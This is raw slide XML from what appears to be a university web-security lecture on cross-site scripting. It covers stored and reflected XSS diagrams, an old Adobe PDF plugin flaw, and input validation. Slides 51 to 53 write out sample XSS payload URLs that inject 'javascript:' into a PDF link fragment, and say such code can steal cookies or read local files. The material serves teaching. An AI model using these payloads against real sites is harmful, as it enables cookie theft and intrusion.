          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="20856438">
            <a:off x="4260850" y="2708275"/>
            <a:ext cx="2738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receive malicious page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="72717" name="Straight Arrow Connector 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49390435-B46D-464B-8A59-45BB8724804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27488" y="4400550"/>
            <a:ext cx="2830512" cy="9906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18" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58BCC1A1-6C6C-9F47-88D3-E3B179637D5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="4802189" y="4508500"/>
            <a:ext cx="1654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click on link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72719" name="TextBox 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35BE2F39-3A58-1E4F-90DD-ADE6DEC3F731}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="4071939" y="4959350"/>
            <a:ext cx="263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echo user input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72720" name="Oval 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83EF5CB9-5C11-A846-8229-3F6A74076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1" y="2387601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721" name="Oval 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AF6AD82-5658-8F4A-A847-57579E5F5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3044826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2722" name="Oval 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFB4BD51-C836-494C-B8AB-BDED3B9B99B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="4467226" y="4143376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2723" name="Straight Arrow Connector 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1D56201-6EEE-4445-B09C-71D5085CAB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5200" y="4762500"/>
            <a:ext cx="3352800" cy="11620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24" name="Straight Arrow Connector 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FB64CCC-79B6-5049-A2FB-562FF4AAFEF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51288" y="3332164"/>
            <a:ext cx="3211512" cy="6873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25" name="TextBox 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAC3077F-63FB-AA41-B40B-FC71272BD805}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="20890924">
            <a:off x="4598988" y="3187700"/>
            <a:ext cx="2305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send valuable data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72726" name="Oval 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{885D0498-A6AC-774A-9A4B-444E1DD97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1" y="3486151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2727" name="Oval 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D570510-90BD-4648-B292-479162B00FC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="3781426" y="4445001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2728" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAB25801-69C1-E248-906A-6DCC232A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BB33AF69-39DE-E046-8A68-2C42480463C9}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>50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8412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077CF220-03BD-9A4F-A971-A3095F72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Adobe PDF Viewer  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>(before version 7.9)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73731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88BC090-1A58-D641-A886-6BE584716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PDF documents execute JavaScript code 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http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1"/>
              <a:t>code_here</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>The “origin” of this injected code is the domain where PDF file is hosted</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73732" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAA3866C-07CB-1C44-8ED7-E51E955F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360ADBF1-B5C8-9348-9DDE-F70053A67B99}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>51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286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6D641B9-6A4A-E349-B4A5-7DA4125E0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Attacker locates a PDF file hosted on site.com </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Attacker creates a URL pointing to the PDF, with JavaScript malware in the fragment portion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>http://site.com/path/to/file.pdf#s=javascript:malcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Attacker entices a victim to click on the link </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>If the victim has Adobe Acrobat Reader Plugin 7.0.x or less, malware executes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Its “origin” is site.com, so it can change content, steal cookies from site.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74755" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7DFAB18-2141-9547-A11E-C573D1D1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31FA46A4-D09E-F948-8D1B-5A6FF31DD859}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>52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4756" name="Title 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4394949-B87C-E945-AF72-C135BC8C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XSS Against PDF Viewer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11995878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7EE58798-38EA-5D40-AC47-1B402712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 Scary Enough?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75779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5905900-927E-FC44-8C3A-6FF4F450B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PDF files on the local filesystem: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sz="2400" dirty="0"/>
              <a:t>file:///C:/Program%20Files/Adobe/Acrobat%207.0/Resource/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>ENUtxt.pdf#blah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>("XSS");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JavaScript malware now runs in local context with the ability to read and write local files ...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75780" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7F84293-574B-7949-8487-27A54DE22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A6A39663-B5FD-0643-8CE2-7CF758E93B4C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>53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6151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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC7BB3BF-82D4-3543-AD34-00FF2119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09B7AAA6-6136-974B-AC2A-324F1CCC8A07}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>54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9E7A3869-F50B-9249-8599-5196CF61F9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82000" cy="2971800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User-created content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Social sites, blogs, forums, wikis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>When visitor loads the page, website displays the content and visitor’s browser executes the script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Many sites try to filter out scripts from user content, but this is difficult!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3133D247-B519-344F-84B1-36B0270E6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Where Malicious Scripts Lurk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1603924342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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F209C5D-F75B-C84E-BBFB-3BC48966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04800"/>
            <a:ext cx="8382000" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Stored XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="77827" name="Picture 18" descr="toshiba_satellite_a105_s4284_laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E791B17-D41D-5B40-906D-A536BE0A5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01914"/>
            <a:ext cx="1436688" cy="14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8" name="Picture 11" descr="CompaqAlphaServerES40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DE41585-6323-DE48-9ED5-BBD59E6E5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75" y="4979988"/>
            <a:ext cx="1155700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Picture 4" descr="DS15serverfront">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78960205-B365-614C-BF4A-1494A7CD6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188" y="1905000"/>
            <a:ext cx="2436812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0" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C7F4D5C-9CD1-E647-98F4-1E77FD5BF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524000"/>
            <a:ext cx="1665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rgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77831" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99503D6B-7A02-6E49-9E08-32F672B36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6476" y="5791200"/>
            <a:ext cx="1736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rgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server victim </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="77832" name="Straight Arrow Connector 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4CF493A-4024-ED45-BDE0-19B25F57DE4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901657" y="3852069"/>
            <a:ext cx="2200275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33" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98953790-2904-604B-B698-C9C9AE57F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886200"/>
            <a:ext cx="1441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rgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77834" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0353297F-CE9A-CC49-90DA-1146CA41B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276600"/>
            <a:ext cx="17208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rgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inject malicious script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="77835" name="Straight Arrow Connector 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BA9BDC0-27E1-5C40-A2FC-C44429FB0F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98888" y="3962400"/>
            <a:ext cx="2830512" cy="9906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36" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58BBF684-4AA2-6B4B-9DE6-130CA0BE2E4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="4560889" y="4067175"/>
            <a:ext cx="2141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rgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>request content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77837" name="TextBox 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEE43389-F501-5544-8516-3358F7E86505}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3835401" y="4568825"/>
            <a:ext cx="2932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rgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>receive malicious script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77838" name="Oval 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DB2DC76-7D23-4244-B067-BEC89E8A3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051" y="2865439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rgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77839" name="Oval 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42F1141B-ACB2-B94E-9B21-893C8F572B75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1039646">
            <a:off x="4237039" y="3703639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rgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77840" name="Oval 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E71FB0B4-AD6F-BF44-AAE0-F2C1F2628E8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="3608389" y="4086226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rgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="77841" name="Straight Arrow Connector 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8443D773-8F6B-AC4C-815D-8D2ADEAB71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76600" y="4324350"/>
            <a:ext cx="3352800" cy="11620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42" name="Straight Arrow Connector 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58401E1C-0E38-E243-A79C-85E538E223A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22688" y="2205039"/>
            <a:ext cx="3211512" cy="6873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43" name="TextBox 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68CE1A44-DA46-034B-87BF-DE118F746D2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="20890924">
            <a:off x="4283076" y="2060575"/>
            <a:ext cx="230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rgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>steal valuable data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77844" name="Oval 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86647465-C1E9-FB48-B2BF-E84190AC4D8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="20886394">
            <a:off x="3962401" y="2359026"/>
            <a:ext cx="365125" cy="365125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rgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="77845" name="Group 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25F63D26-01A8-5242-80E3-DB107CFCC2F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248151"/>
            <a:ext cx="6630988" cy="1687513"/>
            <a:chOff x="1752600" y="4248065"/>
            <a:chExt cx="6630193" cy="168842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CCAF18-BED1-DB4F-963A-B5D4F1682513}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5847859" y="4248065"/>
              <a:ext cx="2534934" cy="40026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buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Store bad stuff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EE4904-D3D7-4641-9170-3269630E58CF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1752600" y="5228082"/>
              <a:ext cx="2534934" cy="7084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buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Users view or download content</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77846" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B19230D1-F845-CB40-8103-C2CAB231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8D6EE39C-4DF0-8B44-97B7-C998C02A846F}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>55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231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B988F537-E776-FD40-A14C-D5B93775E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XSS in the Wild</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80899" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47725A09-9CE1-2546-8F77-D728D06F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C4EAA0C9-9FF8-6442-A1D6-8C9889DF3455}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>56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F62F7DA6-67CC-5849-BABC-CFF592088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914" y="1116013"/>
            <a:ext cx="3011487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http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xssed.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/archive</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="80901" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48E9367B-5FF9-5148-B725-007B51960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" r="64082" b="29575"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2362200" y="1516063"/>
            <a:ext cx="6553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0971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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F56C3D6-5BBE-F642-A13D-336FF6E4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35FA9B6B-A659-4944-93A4-85CCB51CAB51}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>57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07378E3E-CD9C-CB48-923F-BCAEC6411A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3276600"/>
            <a:ext cx="8458200" cy="3429000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Web applications need to reject invalid inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>“Credit card number should be 15 or 16 digits”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>“Expiration date in the past is not valid”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Traditionally done at the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Round-trip communication, increased load</a:t>
            </a:r>
